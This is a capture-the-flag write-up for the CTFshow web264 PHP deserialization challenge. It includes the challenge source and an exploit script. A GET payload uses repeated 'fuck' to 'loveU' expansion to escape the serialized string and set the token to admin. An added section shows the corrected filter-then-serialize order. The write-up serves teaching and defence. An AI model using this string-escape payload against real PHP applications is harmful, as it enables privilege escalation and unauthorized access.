CTFshow Deserialization web264
Contents
- Source code
- Approach
- Solution
- Summary
Source code
index.php
```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php          | a hint is given here
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
session_start();

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    // The filter runs on the already-serialized string
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    $_SESSION['msg']=base64_encode($umsg);
    echo 'Your message has been sent';
}

highlight_file(__FILE__);
```
message.php
```php
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 15:13:03
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 15:17:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

session_start();
highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

// Only the presence of the msg cookie is checked; the data comes from the session
if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_SESSION['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}
```
Approach
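A typical character-escape problem.
Each time fuck is replaced with loveU, one character escapes: the replacement is one character longer, but the length already written by serialize() does not change.
First, get the serialized result directly: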
```php
<?php
class message{
    public $from;
    public $msg;
    public $to='a';
    public $token='user';
}
$msg = new message();
$umsg = serialize($msg);
echo $umsg;
//O:7:"message":4:{s:4:"from";N;s:3:"msg";N;s:2:"to";s:1:"a";s:5:"token";s:4:"user";}
```
user has to be changed to admin. The part that actually has to escape is `";s:5:"token";s:5:"admin";}`, 27 characters in total, so 27 replacements are needed.
Solution
exp
```php
<?php
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
// from and msg are left unset (null), which serializes as N
$f = null;
$m = null;
$t = 'fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}';
$msg = new message($f,$m,$t);
$umsg = str_replace('fuck', 'loveU', serialize($msg));
echo $umsg;
//O:7:"message":4:{s:4:"from";N;s:3:"msg";N;s:2:"to";s:135:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";}
```
Send a GET request to index.php:
```
?f=&m=&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
```
Then request message.php with a cookie msg=xxx added.
Summary
An easy challenge.
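The root cause above is that index.php rewrites the string after serialize() has already fixed the length prefixes. As an added example (not part of the original write-up or the challenge code), the following compares that order with filtering each field before serializing, using the t value from the write-up; with the challenge's order the token is overwritten, with the corrected order it stays user. The names clean(), store_vulnerable(), store_fixed() and load() are hypothetical.

```php
<?php
// Added example: the order of filter and serialize() decides whether the
// s:N: length prefixes still match the data they describe.
class message {
    public $from;
    public $msg;
    public $to;
    public $token = 'user';
    public function __construct($f, $m, $t) {
        $this->from = $f;
        $this->msg  = $m;
        $this->to   = $t;
    }
}

// Hypothetical helper: the word filter from index.php, applied to one field.
function clean($s) {
    return str_replace('fuck', 'loveU', (string)$s);
}

// Challenge behaviour: serialize first, then rewrite the serialized text.
function store_vulnerable($f, $m, $t) {
    return str_replace('fuck', 'loveU', serialize(new message($f, $m, $t)));
}

// Corrected order: rewrite each field, then serialize, so every s:N: is exact.
function store_fixed($f, $m, $t) {
    return serialize(new message(clean($f), clean($m), clean($t)));
}

function load($blob) {
    // allowed_classes restricts which classes unserialize() may instantiate.
    return unserialize($blob, ['allowed_classes' => ['message']]);
}

// Constructed input: the t parameter used in the write-up.
$t = str_repeat('fuck', 27) . '";s:5:"token";s:5:"admin";}';

$bad  = load(store_vulnerable('', '', $t));
$good = load(store_fixed('', '', $t));

printf("serialize then filter: token=%s\n", $bad->token);
printf("filter then serialize: token=%s, strlen(to)=%d\n",
       $good->token, strlen($good->to));
```

On PHP 8.3 and later, unserialize() also emits an E_WARNING for the bytes left over after the first closing brace in the vulnerable case, which is a useful signal to log and alert on.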